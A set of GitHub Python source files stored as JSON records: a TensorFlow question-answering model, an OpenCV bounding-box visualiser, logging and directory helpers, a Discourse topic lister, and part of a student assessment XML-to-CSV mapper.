tf.nn.dynamic_rnn(cell=cell, inputs=self.end_output, dtype=tf.float32)\n self.y_predict_end = tf.unstack(self.y_predict_end, axis=-1)[0]\n tf.summary.histogram('y_predict_end', self.y_predict_end)\n self.y_predict_end_softmax = tf.nn.softmax(self.y_predict_end)\n self.y_predict_end_index = tf.argmax(self.y_predict_end_softmax, axis=1)\n self.y_end_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.y_predict_end, labels=self.y_end)\n tf.summary.scalar('end_loss', tf.reduce_mean(self.y_end_loss))\n \n with tf.variable_scope('train'):\n self.optimizier = tf.train.AdamOptimizer(learning_rate=learning_rate)\n self.total_loss = tf.reduce_mean((self.y_start_loss + self.y_end_loss) / 2.0)\n tf.summary.scalar('total_loss', self.total_loss)\n self.train_op = self.optimizier.minimize(self.total_loss)\n self.init_op = tf.global_variables_initializer()\n self.merge_op = tf.summary.merge_all()\n self.session = tf.Session()\n self.session.run(self.init_op)\n self.saver = tf.train.Saver()\n self.writer = tf.summary.FileWriter(log_dir,graph=self.session.graph)\n \n def _add_dense_layer(self, inputs, output_shape, drop_keep_prob, act=tf.nn.tanh, use_bias=True):\n output = inputs\n for n in output_shape:\n output = tf.layers.dense(output, n, activation=act, use_bias=use_bias)\n output = tf.nn.dropout(output, drop_keep_prob)\n 
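# The start/end decoders above squeeze each position down to a single logit,
# softmax over positions, and take the argmax as a span boundary. A toy numpy
# illustration of that pointer readout (the logit values are made up):
import numpy as np

position_logits = np.array([0.1, 2.5, 0.3, 1.0])  # one logit per context token
probs = np.exp(position_logits) / np.exp(position_logits).sum()
start_index = int(np.argmax(probs))  # -> 1, mirrors y_predict_start_index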
return output\n \n def gated_attention(self, inputs, memory, hidden, keep_prob=1.0, is_train=None, scope=\"dot_attention\", self_attention=False):\n with tf.variable_scope(scope):\n with tf.variable_scope(\"attention\"):\n # u=W1*u_i\n inputs_ = self._add_dense_layer(inputs, hidden, keep_prob, act=tf.nn.relu, use_bias=False)\n \n # v=W2*v_i\n memory_ = self._add_dense_layer(memory, hidden, keep_prob, act=tf.nn.relu, use_bias=False)\n \n # s=softmax(u*v)\n outputs = tf.matmul(inputs_, tf.transpose(memory_, [0, 2, 1]))\n logits = tf.nn.softmax(outputs)\n \n # l=s*v_i\n outputs = tf.matmul(logits, memory)\n \n # r=[u_i,l]\n result = tf.concat([inputs, outputs], axis=-1)\n with tf.variable_scope(\"gate\"):\n # g=\\sigma(W_g*r)\n gate = self._add_dense_layer(result, [result.shape[-1]], keep_prob, act=tf.nn.sigmoid, use_bias=False)\n # o=g*r\n return result * gate\n \n def _biGRUs(self, units_number, activation=tf.nn.relu, keep_prob=1.0):\n fcell = [self._add_GRU(units_number=n, keep_prob=keep_prob, activation=activation) for n in units_number]\n fcell = tf.contrib.rnn.MultiRNNCell(cells=fcell, state_is_tuple=True)\n bcell = [self._add_GRU(units_number=n, keep_prob=keep_prob, activation=activation) for n in units_number]\n bcell = tf.contrib.rnn.MultiRNNCell(cells=bcell, state_is_tuple=True)\n return fcell, bcell\n \n def _add_GRU(self, units_number, activation=tf.nn.tanh, keep_prob=1.0):\n cell = tf.contrib.rnn.GRUCell(units_number, activation=activation)\n cell = tf.contrib.rnn.DropoutWrapper(cell, input_keep_prob=keep_prob)\n return cell\n \n def build_feed_dict(self, context, question, y_start, y_end, drop_keep_prob=0.7):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.y_start: y_start,\n self.y_end: y_end,\n self.dropout_keep_prob: drop_keep_prob\n }\n return feed_dict\n \n def train(self, context, question, y1, y2, drop_keep_prob=0.85, record_interval=10):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.y_start: y1,\n self.y_end: y2,\n self.dropout_keep_prob: drop_keep_prob\n }\n if self.global_step % record_interval == 0:\n _, loss, summaries = self.session.run([self.train_op, self.total_loss, self.merge_op], feed_dict=feed_dict)\n self.writer.add_summary(summaries, self.global_step)\n else:\n _, loss = self.session.run([self.train_op, self.total_loss], feed_dict=feed_dict)\n self.global_step += 1\n return loss\n \n def evaluate(self, context, question, y1, y2, drop_keep_prob=1.0):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.y_start: y1,\n self.y_end: y2,\n self.dropout_keep_prob: drop_keep_prob\n }\n loss = self.session.run([self.total_loss], feed_dict=feed_dict)\n summary = tf.Summary()\n summary_value = summary.value.add()\n summary_value.simple_value = loss[0]\n summary_value.tag = 'evaluate_loss'\n self.writer.add_summary(summary, self.global_step)\n return loss\n \n def predict(self, context, question):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.dropout_keep_prob: 1.0\n }\n start, end = self.session.run([self.y_predict_start_index, self.y_predict_end_index], feed_dict=feed_dict)\n return start, end\n \n def load_model(self):\n self.saver.restore(self.session, self.model_path + '/rnnqanet')\n \n def save_model(self, ):\n if not os.path.exists(self.model_path):\n os.mkdir(self.model_path)\n model_file = self.model_path + '/rnnqanet'\n self.saver.save(self.session, 
model_file)\n","repo_name":"yuriak/QASystem","sub_path":"RNNQANet.py","file_name":"RNNQANet.py","file_ext":"py","file_size_in_byte":14068,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
{"seq_id":"22553494002","text":"import json, os, sys, cv2\nimport logging\nimport numpy as np\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\ndef make_logger(log):\n    logger = logging.getLogger()\n    logger.setLevel(logging.DEBUG)\n    \n    # formatter\n    file_formatter = logging.Formatter(\"%(asctime)s [%(levelname)s:%(lineno)d] -- %(message)s\")\n    # file_handler\n    file_handler = logging.FileHandler(log, mode='w')\n    file_handler.setFormatter(file_formatter)\n    file_handler.setLevel(logging.INFO)\n    # logger.add\n    logger.addHandler(file_handler)\n    \n    return logger\n\ndef readfiles(dir, Ext):\n    file_dict = defaultdict(str)\n    if Ext == 'img':\n        for root, dirs, files in os.walk(dir):\n            for file in files:\n                filename, ext = os.path.splitext(file)\n                if ext == '.jpg' or ext == '.jpeg':\n                    file_path = os.path.join(root, file)\n\n                    file_dict[filename] = file_path\n    elif Ext == 'json':\n        for root, dirs, files in os.walk(dir):\n            for file in files:\n                filename, ext = os.path.splitext(file)\n                if ext == '.json':\n                    file_path = os.path.join(root, file)\n\n                    file_dict[filename] = file_path\n    return file_dict\n\ndef read_img(img_path):\n    img_array = np.fromfile(img_path, np.uint8)\n    img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n    return img\n\n_, img_dir, json_dir, output_dir = sys.argv\n\nlogger = make_logger('log.log')\n\nimg_dict = readfiles(img_dir, 'img')\njson_dict = readfiles(json_dir, 'json')\n\nfor filename, img_path in tqdm(img_dict.items()):\n    json_path = json_dict[filename]\n    \n    root, file = os.path.split(img_path)\n    mid = '\\\\'.join(root.split('\\\\')[len(img_dir.split('\\\\')):])\n    folder= os.path.join(output_dir, mid)\n    os.makedirs(folder, exist_ok=True)\n    output_img_path = os.path.join(folder, file)\n    \n    with open(json_path, encoding='UTF-8') as f:\n        json_file = json.load(f)\n    \n    img = read_img(img_path)\n    font = cv2.FONT_HERSHEY_PLAIN\n    fontScale = 3\n    for img_data in json_file['imageDataList']:\n        if os.path.splitext(img_data['imageName'])[0] == filename:\n            for rect in img_data['rectangleEntries']:\n                text = rect['name']\n                points = rect['points']\n                \n                \n                text_w, text_h = cv2.getTextSize(text, font, fontScale=fontScale, thickness=3)[0]\n                cv2.rectangle(img, (points[0], points[1]), (points[2], points[3]), color=(0, 0, 255), thickness=3)\n                cv2.rectangle(img, (points[0], points[1]),(points[0]+text_w, points[1]+text_h), color=(255,255,255), thickness=-1)\n                cv2.putText(img, text, (points[0], points[1]+text_h), fontFace=font, fontScale=fontScale, color=(0,0,0), thickness=3)\n    \n    \n    result, encoded_img = cv2.imencode('.jpg', img)\n    logger.info(f\"{output_img_path} saved!!\")\n    if result:\n        with open(output_img_path, mode='w+b') as f:\n            encoded_img.tofile(f)\n    \n    \n    \n    ","repo_name":"tkdalsrb123/Alchera","sub_path":"09/0911_tta_bbox_vis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"27223514239","text":"import sys\nimport warnings\n\nfrom loguru import logger\n\n\ndef setup_logging(loglevel='info', stream_sink=sys.stdout):\n    from . 
import runtime_state\n\n if runtime_state.proc_rank != 0:\n logger.disable('veros')\n return\n\n kwargs = {}\n if sys.stdout.isatty():\n kwargs.update(\n colorize=True\n )\n else:\n kwargs.update(\n colorize=False\n )\n\n logger.level('TRACE', color='<dim>')\n logger.level('DEBUG', color='<dim><cyan>')\n logger.level('INFO', color='')\n logger.level('WARNING', color='<yellow>')\n logger.level('ERROR', color='<bold><red>')\n logger.level('CRITICAL', color='<bold><red><WHITE>')\n logger.level('SUCCESS', color='<dim><green>')\n\n config = {\n 'handlers': [\n dict(\n sink=stream_sink,\n level=loglevel.upper(),\n format='<level>{message}</level>',\n **kwargs\n )\n ]\n }\n\n def showwarning(message, cls, source, lineno, *args):\n logger.warning(\n '{warning}: {message} ({source}:{lineno})',\n message=message,\n warning=cls.__name__,\n source=source,\n lineno=lineno\n )\n\n warnings.showwarning = showwarning\n\n logger.enable('veros')\n return logger.configure(**config)\n","repo_name":"cbrockw/ecosys3D","sub_path":"ecosys3D/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44352546533","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 16:02:54 2013\n\n@author: dan\n\"\"\"\n\nfrom os.path import isdir\nfrom os import rename, makedirs\nfrom datetime import datetime\n\ndef makeNewRunDir():\n \n # =====================================================\n # create a directory for every set defined by red.inp\n # and fill them with their own modified bucky.inp\n # =====================================================\n \n # use the current date & time to mak a directory name:\n # YYMMDD-hhmm (Y:year, M:month, D:day, h:hour, m:minute)\n # --------------------------------------------------------\n curTime = str(datetime.now())\n curDir = ( 'data/' + curTime[ 2: 4] + curTime[ 5: 7] + curTime[ 8:10]\n + '-' + curTime[11:13] + curTime[14:16] )\n \n # if someone submits more than one parameter sweep \n # a minute, a different naming scheme is needed\n # --------------------------------------------------\n altDir = curDir + 'a' # make the 1st alternative dir\n \n if isdir( curDir ): # check existence of curDir \n rename( curDir , altDir ) # rename the old directory \n \n if isdir( altDir ): # check existence of altDir \n for i in range(97,123): # cycle through alphabet (a-z)\n altDir = curDir + chr(i) # get new altDir\n if not isdir( altDir ): # check existence of altDir \n curDir = altDir # make altDir the curDir \n break # stop cycling through alphabet\n \n makedirs( curDir ) # make new directory\n \n return curDir","repo_name":"djsegal/ahab_legacy_","sub_path":"pequod/makeNewRunDir.py","file_name":"makeNewRunDir.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17868482342","text":"import os\nimport requests\nimport pprint\n\n# see - https://meta.discourse.org/t/reading-topics-in-a-forum-with-javascript/23042/3\n# for notes on getting topics\n# Main thing is to get categories from sites first, and then enumerate over topics in\n# each category.\n\n# print(os.environ['DISCOURSE_AUTH'])\n# print(os.environ['DISCOURSE_ROOT'])\n# print(os.environ['DISCOURSE_SESS'])\n\n# Check environment cariables are set\n\nif 'DISCOURSE_AUTH' in os.environ:\n uauth=os.environ['DISCOURSE_AUTH']\nelse:\n print('ERROR: Environment variable DISCOURSE_AUTH not found.')\n print('This 
is the value from https://DOMAIN_NAME/admin/api/keys')\n    exit()\n\nif 'DISCOURSE_ROOT' in os.environ:\n    uroot=os.environ['DISCOURSE_ROOT']\nelse:\n    print('ERROR: Environment variable DISCOURSE_ROOT not found.')\n    print('This is the domain name of the discourse site e.g. https://DOMAIN_NAME')\n    exit()\n\nif 'DISCOURSE_SESS' in os.environ:\n    usess=os.environ['DISCOURSE_SESS']\nelse:\n    print('ERROR: Environment variable DISCOURSE_SESS not found.')\n    print('This is an _t session key from a valid https://DOMAIN_NAME session')\n    print('The _t session key is a security \"feature\" for some discourse installs')\n    exit()\n\n# Get site info\n\nurl_site_list='https://%s/%s?%s'%(uroot,'site.json',uauth)\ncookies=dict(_t=usess)\n\nr=requests.get(url_site_list,cookies=cookies)\npp = pprint.PrettyPrinter(indent=1)\n# pp.pprint(r.json())\n# exit()\n\n# Iterate over categories from site\nfor c in r.json()['categories']:\n    url_category_list='https://%s/c/%d.json?%s'%(uroot,c[\"id\"],uauth)\n    rr=requests.get(url_category_list,cookies=cookies)\n    tl=rr.json()[\"topic_list\"][\"topics\"]\n\n    # Iterate over topic list returned for each category and match ready tag\n    for t in tl:\n        if 'zeta:launch-ready' in t['tags']:\n            print('Ready_topic ', t['id'], t['title'])\n","repo_name":"necyberteam/discourse-tools","sub_path":"christophernhill_tools/get_topics.py","file_name":"get_topics.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33518888953","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
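# --- Editor's note: hedged sketch, not from the repo ---
# A limitation of the category walk above: /c/<id>.json returns only the first page
# of topics. If I recall the Discourse API correctly, paginated topic lists expose a
# relative 'more_topics_url' field; treat that field name as an assumption and check
# it against your instance (the returned path may also need '.json' spliced in).
import requests

def iter_topics(uroot, cat_id, uauth, cookies):
    url = 'https://%s/c/%d.json?%s' % (uroot, cat_id, uauth)
    while url:
        topic_list = requests.get(url, cookies=cookies).json()['topic_list']
        yield from topic_list['topics']
        more = topic_list.get('more_topics_url')  # assumption: present when more pages exist
        url = 'https://%s%s' % (uroot, more) if more else None
# --- end editor's note ---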
See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Aug 8, 2014\n\n@author: dip\n'''\nfrom smarter_score_batcher.utils.xml_utils import extract_meta_with_fallback_helper, \\\n extract_meta_without_fallback_helper\nimport itertools\nimport json\nfrom smarter_score_batcher.utils.constants import PerformanceMetadataConstants\nfrom smarter_score_batcher.error.exceptions import MetadataException\nfrom edcore.utils.utils import xml_datetime_convert\nimport hashlib\nfrom edauth.security.utils import load_class\nfrom smarter_score_batcher.celery import conf\n\n\nclass XMLMeta:\n '''\n Used for storing and extracting elements from xml\n '''\n def __init__(self, root, xpath, attribute, attribute_to_compare=None):\n self.root = root\n self.path = xpath\n self.attribute = attribute\n self.attribute_to_compare = attribute_to_compare\n\n def get_value(self):\n if self.attribute_to_compare:\n val = extract_meta_with_fallback_helper(self.root, self.path, self.attribute, self.attribute_to_compare)\n else:\n val = extract_meta_without_fallback_helper(self.root, self.path, self.attribute)\n return val\n\n\nclass DateMeta(XMLMeta):\n\n def get_value(self):\n date = super().get_value()\n return xml_datetime_convert(date)\n\n\nclass IntegerMeta(XMLMeta):\n\n def get_value(self):\n data = super().get_value()\n return str(int(data)) if data else data\n\n\nclass HashMeta(XMLMeta):\n '''\n Evaluates the value from XML attribute, and hashes it\n '''\n\n def get_value(self):\n data = super().get_value()\n return hashlib.sha1(data.encode(\"utf-8\")).hexdigest()\n\n\nclass YesNoMeta(XMLMeta):\n\n def get_value(self):\n result = None\n data = super().get_value()\n if data and data is not None:\n if data.lower() == \"yes\":\n result = \"Yes\"\n elif data.lower() == \"no\":\n result = \"No\"\n return result\n\n\nclass ValueMeta():\n\n def __init__(self, value):\n self.value = value\n\n def get_value(self):\n return self.value\n\n\nclass XMLClaimScore:\n '''\n Accommodation Specific - Perhaps to handle default values\n '''\n def __init__(self, root, xpath, scaleScore_attribute, standardError_attribute):\n self.__scaleScore = XMLMeta(root, xpath, scaleScore_attribute)\n self.__standardError = XMLMeta(root, xpath, standardError_attribute)\n self.__value_scaleScore = self.__scaleScore.get_value()\n self.__value_standardError = self.__standardError.get_value()\n\n def get_max(self):\n meta = XMLClaimScore.XMLClaimScoreMeta(str(int(float(self.__value_scaleScore if self.__value_scaleScore is not None else 0)) + int(float(self.__value_standardError if self.__value_standardError is not None else 0))))\n return meta\n\n def get_min(self):\n meta = XMLClaimScore.XMLClaimScoreMeta(str(int(float(self.__value_scaleScore if self.__value_scaleScore is not None else 0)) - int(float(self.__value_standardError if self.__value_standardError is not None else 0))))\n return meta\n\n class XMLClaimScoreMeta():\n def __init__(self, value):\n self.__value = value\n\n def get_value(self):\n return self.__value\n\n\nclass Mapping:\n '''\n Used for storing and evaluating mapping from xml to csv\n '''\n def __init__(self, src, target):\n self.src = src\n self.target = target\n\n def evaluate(self):\n return self.src.get_value()\n\n\nclass AssessmentHeaders:\n '''\n Constants for assessment csv landing zone file\n '''\n # In the order of csv headers\n StateAbbreviation = 'StateAbbreviation'\n ResponsibleDistrictIdentifier = 'ResponsibleDistrictIdentifier'\n OrganizationName = 
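# --- Editor's note: worked example of the arithmetic in XMLClaimScore above ---
# get_min()/get_max() compute the interval scaleScore -/+ standardError, coercing
# each value through float then int and treating a missing value as 0:
def score_interval(scale_score, standard_error):
    s = int(float(scale_score if scale_score is not None else 0))
    e = int(float(standard_error if standard_error is not None else 0))
    return str(s - e), str(s + e)

assert score_interval('2500.0', '30.0') == ('2470', '2530')
assert score_interval(None, '30.0') == ('-30', '30')  # missing score collapses to 0
# --- end editor's note ---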
'OrganizationName'\n ResponsibleSchoolIdentifier = 'ResponsibleSchoolIdentifier'\n NameOfInstitution = 'NameOfInstitution'\n StudentIdentifier = 'StudentIdentifier'\n ExternalSSID = 'ExternalSSID'\n FirstName = 'FirstName'\n MiddleName = 'MiddleName'\n LastOrSurname = 'LastOrSurname'\n Sex = 'Sex'\n Birthdate = 'Birthdate'\n GradeLevelWhenAssessed = 'GradeLevelWhenAssessed'\n HispanicOrLatinoEthnicity = 'HispanicOrLatinoEthnicity'\n AmericanIndianOrAlaskaNative = 'AmericanIndianOrAlaskaNative'\n Asian = 'Asian'\n BlackOrAfricanAmerican = 'BlackOrAfricanAmerican'\n NativeHawaiianOrOtherPacificIslander = 'NativeHawaiianOrOtherPacificIslander'\n White = 'White'\n DemographicRaceTwoOrMoreRaces = 'DemographicRaceTwoOrMoreRaces'\n IDEAIndicator = 'IDEAIndicator'\n LEPStatus = 'LEPStatus'\n Section504Status = 'Section504Status'\n EconomicDisadvantageStatus = 'EconomicDisadvantageStatus'\n MigrantStatus = 'MigrantStatus'\n Group1Id = 'Group1Id'\n Group1Text = 'Group1Text'\n Group2Id = 'Group2Id'\n Group2Text = 'Group2Text'\n Group3Id = 'Group3Id'\n Group3Text = 'Group3Text'\n Group4Id = 'Group4Id'\n Group4Text = 'Group4Text'\n Group5Id = 'Group5Id'\n Group5Text = 'Group5Text'\n Group6Id = 'Group6Id'\n Group6Text = 'Group6Text'\n Group7Id = 'Group7Id'\n Group7Text = 'Group7Text'\n Group8Id = 'Group8Id'\n Group8Text = 'Group8Text'\n Group9Id = 'Group9Id'\n Group9Text = 'Group9Text'\n Group10Id = 'Group10Id'\n Group10Text = 'Group10Text'\n AssessmentGuid = 'AssessmentGuid'\n AssessmentSessionLocationId = 'AssessmentSessionLocationId'\n AssessmentSessionLocation = 'AssessmentSessionLocation'\n AssessmentAdministrationFinishDate = 'AssessmentAdministrationFinishDate'\n AssessmentYear = 'AssessmentYear'\n AssessmentType = 'AssessmentType'\n AssessmentAcademicSubject = 'AssessmentAcademicSubject'\n AssessmentLevelForWhichDesigned = 'AssessmentLevelForWhichDesigned'\n AssessmentSubtestResultScoreValue = 'AssessmentSubtestResultScoreValue'\n AssessmentSubtestMinimumValue = 'AssessmentSubtestMinimumValue'\n AssessmentSubtestMaximumValue = 'AssessmentSubtestMaximumValue'\n AssessmentPerformanceLevelIdentifier = 'AssessmentPerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim1Value = 'AssessmentSubtestResultScoreClaim1Value'\n AssessmentSubtestClaim1MinimumValue = 'AssessmentSubtestClaim1MinimumValue'\n AssessmentSubtestClaim1MaximumValue = 'AssessmentSubtestClaim1MaximumValue'\n AssessmentClaim1PerformanceLevelIdentifier = 'AssessmentClaim1PerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim2Value = 'AssessmentSubtestResultScoreClaim2Value'\n AssessmentSubtestClaim2MinimumValue = 'AssessmentSubtestClaim2MinimumValue'\n AssessmentSubtestClaim2MaximumValue = 'AssessmentSubtestClaim2MaximumValue'\n AssessmentClaim2PerformanceLevelIdentifier = 'AssessmentClaim2PerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim3Value = 'AssessmentSubtestResultScoreClaim3Value'\n AssessmentSubtestClaim3MinimumValue = 'AssessmentSubtestClaim3MinimumValue'\n AssessmentSubtestClaim3MaximumValue = 'AssessmentSubtestClaim3MaximumValue'\n AssessmentClaim3PerformanceLevelIdentifier = 'AssessmentClaim3PerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim4Value = 'AssessmentSubtestResultScoreClaim4Value'\n AssessmentSubtestClaim4MinimumValue = 'AssessmentSubtestClaim4MinimumValue'\n AssessmentSubtestClaim4MaximumValue = 'AssessmentSubtestClaim4MaximumValue'\n AssessmentClaim4PerformanceLevelIdentifier = 'AssessmentClaim4PerformanceLevelIdentifier'\n AccommodationAmericanSignLanguage = 
'AccommodationAmericanSignLanguage'\n AccommodationBraille = 'AccommodationBraille'\n AccommodationClosedCaptioning = 'AccommodationClosedCaptioning'\n AccommodationTextToSpeech = 'AccommodationTextToSpeech'\n AccommodationAbacus = 'AccommodationAbacus'\n AccommodationAlternateResponseOptions = 'AccommodationAlternateResponseOptions'\n AccommodationCalculator = 'AccommodationCalculator'\n AccommodationMultiplicationTable = 'AccommodationMultiplicationTable'\n AccommodationPrintOnDemand = 'AccommodationPrintOnDemand'\n AccommodationPrintOnDemandItems = 'AccommodationPrintOnDemandItems'\n AccommodationReadAloud = 'AccommodationReadAloud'\n AccommodationScribe = 'AccommodationScribe'\n AccommodationSpeechToText = 'AccommodationSpeechToText'\n AccommodationStreamlineMode = 'AccommodationStreamlineMode'\n AccommodationNoiseBuffer = 'AccommodationNoiseBuffer'\n AdministrationCondition = 'AdministrationCondition'\n CompleteStatus = 'CompleteStatus'\n\n\nclass AssessmentData:\n def __init__(self, *mappings):\n self.__mappings = itertools.chain(*mappings)\n self.__header = []\n self.__values = []\n\n def add(self, header, value):\n self.__header.append(header)\n self.__values.append(value)\n\n @property\n def header(self):\n return self.__header\n\n @property\n def values(self):\n return self.__values\n\n def evaluate(self):\n for m in self.__mappings:\n # Save the CSV Header, and Value Extracted from XML\n self.add(m.target, m.evaluate())\n\n\ndef getClaimMappingName(metadata, claim_name, default_value):\n '''\n get mapping name for claims\n '''\n mapping = default_value\n if metadata is not None:\n claims = metadata.get(PerformanceMetadataConstants.CLAIMS)\n if claims is not None:\n claim = claims.get(claim_name)\n if claim is not None:\n mapping = claim.get(PerformanceMetadataConstants.MAPPING, default_value)\n return mapping\n\n\ndef get_assessment_mapping(root, metadata):\n '''\n Returns state code and the landing zone format of assessment csv file\n '''\n examinee = root.find(\"./Examinee\")\n opportunity = root.find(\"./Opportunity\")\n test_node = root.find(\"./Test\")\n\n groups = get_groups(examinee)\n accommodations = get_accommodations(opportunity)\n claims = get_claims(metadata, opportunity)\n\n asmt_type = extract_meta_without_fallback_helper(root, \"./Test\", \"assessmentType\")\n subject = extract_meta_without_fallback_helper(root, \"./Test\", \"subject\")\n grade = extract_meta_without_fallback_helper(root, \"./Test\", \"grade\")\n asmt_id = extract_meta_without_fallback_helper(root, \"./Test\", \"testId\")\n academic_year = extract_meta_without_fallback_helper(root, \"./Test\", \"academicYear\")\n effective_date = extract_meta_without_fallback_helper(root, \"./Opportunity\", \"dateCompleted\")\n completeStatus = extract_meta_without_fallback_helper(root, \"./Opportunity\", \"completeStatus\")\n administrationCondition = extract_meta_without_fallback_helper(root, \"./Opportunity\", \"administrationCondition\")\n meta_class = load_class(conf.get('smarter_score_batcher.class.meta', 'smarter_score_batcher.utils.meta.Meta'))\n meta = meta_class(True, '', '', '', academic_year, asmt_type, subject, grade, effective_date, asmt_id)\n stateCode = XMLMeta(examinee, \"./ExamineeRelationship/[@name='StateAbbreviation']\", \"value\", \"context\")\n # In the order of the LZ mapping for easier maintenance\n mappings = AssessmentData([Mapping(stateCode, AssessmentHeaders.StateAbbreviation),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='ResponsibleDistrictIdentifier']\", \"value\", 
\"context\"), AssessmentHeaders.ResponsibleDistrictIdentifier),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='OrganizationName']\", \"value\", \"context\"), AssessmentHeaders.OrganizationName),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='ResponsibleInstitutionIdentifier']\", \"value\", \"context\"), AssessmentHeaders.ResponsibleSchoolIdentifier),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='NameOfInstitution']\", \"value\", \"context\"), AssessmentHeaders.NameOfInstitution),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='StudentIdentifier']\", \"value\", \"context\"), AssessmentHeaders.StudentIdentifier),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='AlternateSSID']\", \"value\", \"context\"), AssessmentHeaders.ExternalSSID),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='FirstName']\", \"value\", \"context\"), AssessmentHeaders.FirstName),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='MiddleName']\", \"value\", \"context\"), AssessmentHeaders.MiddleName),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='LastOrSurname']\", \"value\", \"context\"), AssessmentHeaders.LastOrSurname),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='Sex']\", \"value\", \"context\"), AssessmentHeaders.Sex),\n Mapping(DateMeta(examinee, \"./ExamineeAttribute/[@name='Birthdate']\", \"value\", \"context\"), AssessmentHeaders.Birthdate),\n Mapping(IntegerMeta(examinee, \"./ExamineeAttribute/[@name='GradeLevelWhenAssessed']\", \"value\", \"context\"), AssessmentHeaders.GradeLevelWhenAssessed),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='HispanicOrLatinoEthnicity']\", \"value\", \"context\"), AssessmentHeaders.HispanicOrLatinoEthnicity),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='AmericanIndianOrAlaskaNative']\", \"value\", \"context\"), AssessmentHeaders.AmericanIndianOrAlaskaNative),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='Asian']\", \"value\", \"context\"), AssessmentHeaders.Asian),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='BlackOrAfricanAmerican']\", \"value\", \"context\"), AssessmentHeaders.BlackOrAfricanAmerican),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='NativeHawaiianOrOtherPacificIslander']\", \"value\", \"context\"), AssessmentHeaders.NativeHawaiianOrOtherPacificIslander),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='White']\", \"value\", \"context\"), AssessmentHeaders.White),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='DemographicRaceTwoOrMoreRaces']\", \"value\", \"context\"), AssessmentHeaders.DemographicRaceTwoOrMoreRaces),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='IDEAIndicator']\", \"value\", \"context\"), AssessmentHeaders.IDEAIndicator),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='LEPStatus']\", \"value\", \"context\"), AssessmentHeaders.LEPStatus),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='Section504Status']\", \"value\", \"context\"), AssessmentHeaders.Section504Status),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='EconomicDisadvantageStatus']\", \"value\", \"context\"), AssessmentHeaders.EconomicDisadvantageStatus),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='MigrantStatus']\", \"value\", \"context\"), AssessmentHeaders.MigrantStatus),\n\n Mapping(ValueMeta(meta.asmt_id), AssessmentHeaders.AssessmentGuid),\n Mapping(XMLMeta(opportunity, \".\", \"oppId\"), 
AssessmentHeaders.AssessmentSessionLocationId),\n                               Mapping(XMLMeta(opportunity, \".\", \"server\"), AssessmentHeaders.AssessmentSessionLocation),\n                               Mapping(ValueMeta(meta.effective_date), AssessmentHeaders.AssessmentAdministrationFinishDate),\n                               Mapping(ValueMeta(meta.academic_year), AssessmentHeaders.AssessmentYear),\n                               Mapping(ValueMeta(meta.asmt_type), AssessmentHeaders.AssessmentType),\n                               Mapping(ValueMeta(meta.subject), AssessmentHeaders.AssessmentAcademicSubject),\n                               Mapping(ValueMeta(administrationCondition), AssessmentHeaders.AdministrationCondition),\n                               Mapping(ValueMeta(completeStatus), AssessmentHeaders.CompleteStatus),\n                               Mapping(ValueMeta(meta.grade), AssessmentHeaders.AssessmentLevelForWhichDesigned)],\n                               claims, groups, accommodations)\n    mappings.evaluate()\n    return stateCode.get_value(), mappings\n\n\ndef get_groups(examinee):\n    '''\n    Get groupings from XML <ExamineeRelationship> elements.\n    Assign each element of the group list to group1, group2, .., group10 according to its order in the list.\n\n    Elements with attribute 'StudentGroupName' are mapped to groups in their order of appearance in the XML;\n    only the first 10 groups are kept.\n    '''\n    TOTAL_GROUPS = 10\n    mappings = []\n    groups = 